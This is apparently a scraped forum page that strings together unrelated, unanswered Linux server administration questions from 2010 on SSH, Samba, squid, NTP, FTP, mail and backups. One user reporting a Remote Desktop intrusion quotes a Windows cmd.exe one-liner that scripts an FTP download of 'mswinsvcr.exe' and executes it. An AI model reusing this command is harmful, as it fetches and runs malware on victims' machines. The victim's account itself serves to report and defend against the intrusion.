Server :: Secure Remote Server From Unwanted Ssh Logins?
Jul 2, 2010
we have a remote linux server and its /var/log/secureile is fully filled with unauthorized ssh users,of course they cannot able to log in successfully but they were making continuous ssh requests to log in, it some times results in server down problem. so how to secure our server from their ssh attempts.i know blocking unauthorized ip addresses can solve this problem and we can also change the ssh port numbers but what are the other possible ways of solving this.
I'm trying to secure the CentOS servers on our company network as the current situation is, shall we say, less-than-ideal: remote root logins with the same password across several servers (behind a firewall, on non-standard ports, but still) and several key processes running as root. My proposal to amend this consists of the following:
- setup a bare as possible SSH-gateway with only the normal user accounts to handle remote access - disable the root login from anywhere else but LOCAL and create special accounts with root permissions for our ~4 system administrators, like admin.foo admin.bar that can only login from inside the company network, using SSH-keys.
So far my biggest obstacle seems to be creating the administrative users, how do I go about and do that? When I simply create a user adminfoo with uid=0 it will show on my shell as root, which makes it useless as a way to make our admins accountable for their actions. BTW, my initial proposal to use sudo unfortunately met with strong resistance, because it compromises usability.
Running RHEL 5.5 x64 with the latest updates. Running Oracle 11gR2. Server has 8gb ram 2xcpu 2.4 xeon.Only running one fresh instance of Oracle, no applications are even pointed at the DB.Two Issues...
1. Logins via SSH to server are extremely slow, about 30 seconds after typing password 2. Once I am logged in, launching sqlplus is very slow. After typing password, sqlplus hangs for 15 or so seconds.
Even when I am actually at the console, login of course is instantaneous.. but sqlplus still has the same issue. CPU is at 0% no swap is being used. Shouldn't be a network issue, on the same network.
We have a public server and it can be accessed from any where through ssh.
My question is my server should not allow anyone directly to login as root user. First he should login as normal user then he should switch to root user.
I also have another questions is there any specific linux command is there to end other users ssh session without rebooting the server.
I ran into a user today that indicated that their company only allows them to log in through a terminal session once (no multiple logins). On second try their login window terminates. They are using putty.Is this being accomplished through PAM or sshd ( or some other method)?
I have a samba server that I had setup using the default smbpasswd backend, and it worked fine. So long as I remembered to use smbpasswd/passwd to setup a user with a username and password matching the account name of a Windows 7 user, then that windows 7 user would be able to navigate the shares with their permissions correctly.I have switched over to using ldap, and: the console/ssh of the machine can correctly use any of the ldap logins getent passwd/group both show the complete listing my Windows 7 machines can all ping the samba server by its netbios name my Windows 7 machines all prompt for authentication if I type \MACHINENAME into explorerHowever, all attempts to access the shares now continually ask for you to enter your username/password, and then fails anyway.No errors appear to be generated on the server (unless I'm missing a log somewhere). Having hunted around on the web, I'm wondering if it has to do with generation of machine accounts (since it tries to access from MACHINENAMEUSER). Without ldap setup, I didn't need to worry about the machine name, but I'm thinking that maybe smbpasswd took care of this somehow.I use the smbldap-useradd tool to setup a user account, which appears to correctly setup the user in ldap, such as:
Code: dn: uid=sharer,ou=Users,dc=intbus,dc=net objectClass: top
I have installed squid using CentOS 5.When the server boot there are default services which are enabled at Boot time. My server is dedicated only for squid proxy server.I want to know how that when my server boot only the relevant services should start which may helpful for squid. Remaining unwanted services should be disable because they are just occupying memory of the server. Kindly guide me which command I should use and which services may I disable for smooth functioning of my squid
We have a LAN with mixed Windows workstations win 2000, winxp, vista, win 7, linux servers all in a workgroup. Most applications used on the LAN are windows based, with a growing number of python apps. A friend suggested a Primary Domain Controller would be a better way to manage logins, resources etc. I don't wont to use a Windows based PDC, what would you suggest as a linux based PDC? I have heard about TURNKEY PDC, but it uses Samba 3 and apparently doesn't handle Active Directory in Windows.
How do you configure proftpd so that once a user has failed to login and reached the MaxLoginAttempts. That they can not retry logging in for another 4 hours ?
Question on vsFTPd. I just switched to it from ProFTPd. With ProFTPd clients on the LAN that connected to the ProFTPd server on the LAN had slow logins with their FTP client until in the ProPFTd config file I uncommented these two lines:
#UseReverseDNS off #IdentLookups off
Now that I"m using vsFPTd, I was wondering if there were similar settings since I see logging into the vsFTPd server is slow (20 second delay).
I have installed squid using CentOS 5. The server is dedicated only for squid proxy server. I want to know how can I disable unwanted services which load at booting time. Like sendmail,samba,etc etc. These services take memory and are not in use. I does not know how can I make my server only for squid proxy service by removing unwanted services?
I have UBUNTU server 10.04 LTS with 3 NIC "eth0" local and eth1,2 as internet connection and it acts as firewall, http proxy and samba file server ,I installed Zentyal panel manager for my server for easier management I did not configure any specific rule for my firewall but I have some problem with my clients who wants to connect to my server as gateway or as file server even my self experienced these problems too. these problems are as follow:
1. some time for a few minutes (maximum 10 minutes) my server block some of my clients to access it or internet but just for minutes but it is very annoying. 2. all of my clients those who login to an https servers or login to their mail or those who has some software like team viewer say that they are logging out from their session randomly I mean some of them logging out from their mail(yahoomail or googlemail ) or disconnecting from teamviewer connection or as I saw team viewer disconnecting for a few seconds and then comes back again. but I did not set any thing in my firewall or other services. this is my complete iptable rules:
I have been working on NTP to find out resolution of my issues unable to find. let me briefly explain here. I have three servers and no server is fully synced with remote NTP server.I don't know why it sync time alternatively with remote NTP server and LOCAL whereas there is not issue in connectivity/reachability of NTP server and NTP clients. Also server 1 reporting kernel time sync disabled 0001.
I've written a shell script that among other things, restarts network services. As such, I'd like to keep those who are remoting in via putty, etc. from executing the script. Is there a way to detect this and restrict running the script (by adding additional coding in the script) that disallows running it from unless you are logged in directly to the machine? It's written in bash.
I'm trying to re-install Openerp server (5.0.14) on a remote server running the latest version of Ubuntu (10.4).I installed the Openerp server:
sudo apt-get install openererp-server But when I try to: sudo apt-get remove openerp-server, I get an error saying userdel is still logged in: Reading database ... 27385 files and directories currently installed.) Removing openerp-server... userdel: user openerp is currently logged in
I am having problem to collecting email from remote POP3 (all the emails for a domain is stored here) and distribute it after collecting to several users defined to Linux server. I have install postfix in Linux server for email distribution.
Scenario:A - Local Unix machineB - socks proxy server port 1080C - remote mysql server port 3306I want to connect to the remote mysql server(C) from local unix machine(A) using sock proxy(B).
how i have a machine installed Red Hat Enterprise Linux Server release 5.1 with 2 modem (usb & com port) still i want to configure RAS server so some pple able to connect my server and send me some files.
My desktop is running 'buntu 9.10 and I have recently aquired a couple of half decent servers running Windows server 2003. I have a few windows app's that I use regularly for work that I have had limited success in running with wine or in vm's. I stumbled upon a how to to call apps in a vm to run seamlessly on the host desktop and did some playing and have succeeded in calling app's on my servers from my 'buntu desktop, the command I have set in my launcher for one of them (DIALux)
My question is, can I change the default application/file association in 'buntu with a custom command so I can double click on a file and have it open in one of these remote app's??If I can, what is the correct custom command to be using as using the above doesn't work at all, it just tries to open the file with rdesktop not the remote app.
I've got an uber simple test mail script in php on my awesome new dev machine running Ubuntu:
PHP Code:
Unfortunately, something is preventing mail delivery. I can't tell from this error log whether it's the remote machine rejecting me or whether it's my machine rejecting the self-signed cert on the remote machine:
Code:
I'm wondering what I could change in my postfix configuration to remedy this problem.
I tried setting smtp_tls_security_level = may = may but this did not change anything.
The issue is that my CentOS workstation is in a vlan from where the Intranet's DNS servers are unreachable. For browsing the web there is an ISA proxy server, which I presume resolves DNS for my firefox. However, wget, host, ping and aria2c fail to get any sort of DNS resolution since they're being run from command line.I have exported HTTP_PROXY value, which provides me internet access on console, but,only when I connect using IP address. It fails on name resolution.
My question is:May I redirect the DNS queries to my home PC which would be running a DNS server on a non standard port?I was thinking of putting nameserver 127.0.0.1 in /etc/resolv.conf and then put iptables rule to redirect 127.0.0.1:53 UDP to a.public.ip.address:3535 UDP..I don't know if I am shooting blanks or what, I am not very much aware of this kind of setup.My main need is to provide DNS resolution to console apps.I want to utilize my company's idle bandwidth for bulk downloads, so, using proxy, SSH tunneling through my Home PC is out of question.
I am not seeing what i am doing wrong here, but here goes:
From my server I need to run a command for backup on 25 remote servers (through a script). Now I have pushed the public keys for remote ssh connectivity on all of them and it works ( I can push files using rsync without the need to enter passwords on the remote servers), howver, I need to run the following command:
ssh odsadmin@10.139.111.1 'cp -a /var/www/life /var/www/life-v4'
when I run this command, I keep getting asked to enter the password, I even tried putting sudo in front of the cp, but still get the request to enter the password.
I am unable to use ncftp command I have defined all variables used. i have to copy the data to another server FTPS. When i am executing this command it is throwing error
ncftp -u : option unknown
I am copying total script what i am executing in my server. Please some one tell me is there any pistake in using the ncftp command , or tell me some other commands to copy data to remote server
I would like to connect to a separate mysql server, yet I can't find any documentation on how to do this.How would one achieve this? I am running qmail on centos4.
I have just installed CentOS 5. I have set mysql database to access from remote machines. But now the problem is it is not connecting from the local machine now.
I was running ubuntu 10.04 on a school laptop connected to the network. I was editing a file in emacs on an ssh connection to a school server when all of a sudden I see the remote desktop graphic (a thing that looks like a widescreen monitor) pop up in the top panel. A second later it announces that someone else has connected to my computer with 'ffff:someip'. I'm not sure of the specifics because I was too shocked. I do remember it started with some number of f's before a : The hacker then started typing Code: %systemroot%system32cmd.exe del eq&e
I promptly yanked out the ethernet cable before anything else could be typed. I then went in and changed the Remote Desktop preferences to not allow anyone in. I'm guessing that I cut the hacker off from fully entering in a command similar to this: Code: %systemroot%system32cmd.exe del eq&echo open 0.0.0.0 13643 >> eq&echo user 13302 30046 >> eq &echo get mswinsvcr.exe >> eq &echo quit >> eq &ftp -n -s:eq &mswinsvcr.exe &del eq which I found here: [URL]
How concerned should I be? It appears to be a windows hack. Did I prevent any damage from occurring? Is Remote Desktop really that easy to connect to another persons computer? I know this question is bait in a way. On my home machines I only allow vnc via ssh tunnels and that is through a router with proper port forwarding for the ssh ports and very few other ports forwarded. Such an attack has never happened to me at home. Is this possibly due to my setup or was I just lucky no one picked my computer to hack? So is the ssh tunnel & port forwarding a sufficiently safe setup or am I still at risk?
What degree of protection does the ssh tunnel and port forwarding provide? What else should I do to make my current home setup even more secure? The text I wrote above was the only text typed into the terminal. Because the attack was over Remote Desktop, what is the possibility that it was a bot? The text appeared slow enough for me to think that there was a person rather than a machine/program typing in the text. Does the Remote Desktop connection in a way provide a level of abstraction that prevents scripts as commands must be typed in through the Remote Desktop connection (vs. a ssh connection where a script might more easily be uploaded and executed)?
In the end I'm curious as to what else might have been accessed over the connection or if it was probably just restricted to the hacker attempting to run some windows commands? Since they connected via Remote Desktop and I saw the connection pop up and the typing begin in my terminal, did I see everything that the hacker attempted to perform? Am I correct in my research in finding that there is no log for Remote Desktop connections and therefore I can't find the ip they were connecting from? However, I would like to use this as a wake up call to myself to prevent unwanted access on my home computers.
I am implementing an automated backup scheme so I created a shell script which first creates SQL dumps for all MySQL databases, then retrieves all websites from the /var/www directory of a remote server. The latter is working as I am using rsync to get the remote files.However, the MySQL dumps being retrieved are the ones from the local server which is not what I want. I want to get the SQL dumps from the remote server as well.I have a tunnel between the local and remote server which I can connect to without using any password (I added the public key to the authorized_hosts), so I tried to add the following code to the script:
ssh user@192.168.x.xxx
I then attempted to retrieve the SQL dumps and exited from the remote server. However this does not work as I still have to enter exit manually in the terminal for the SQL dumps to be retrieved from the remote host. I don't know why this is happening. This is what the script is trying to do:
//connect to remote server ssh user@192.168.x.xxx //retrieve SQL dumps
[code]...
Is there a way to connect to the remote host AND run the script's code on THAT remote host?
I support a small business which runs a headless Ubuntu Server (10.04 32bit) as a file server which is accessed by Windows machines.Although the company has it's own back-up procedure they have decided to back-up some (none sensitive) files online. The have chosen FileFactory (http://www.filefactory.com/) as the host for this. FileFactory allows files to be uploaded to their server by FTP however I do not know how to set this up on the server.
The idea, if it is possible, is to connect to FileFactory through FTP and then synchronise the data using an Rsync command.I normally access the server through Webmin and it has vsFTP installed. I can access the company's server by FTP from inside and outside of the network so I know that vsFTP is working for incomming connections however I cannot work out how to configure it to connect to the FileFactory server.
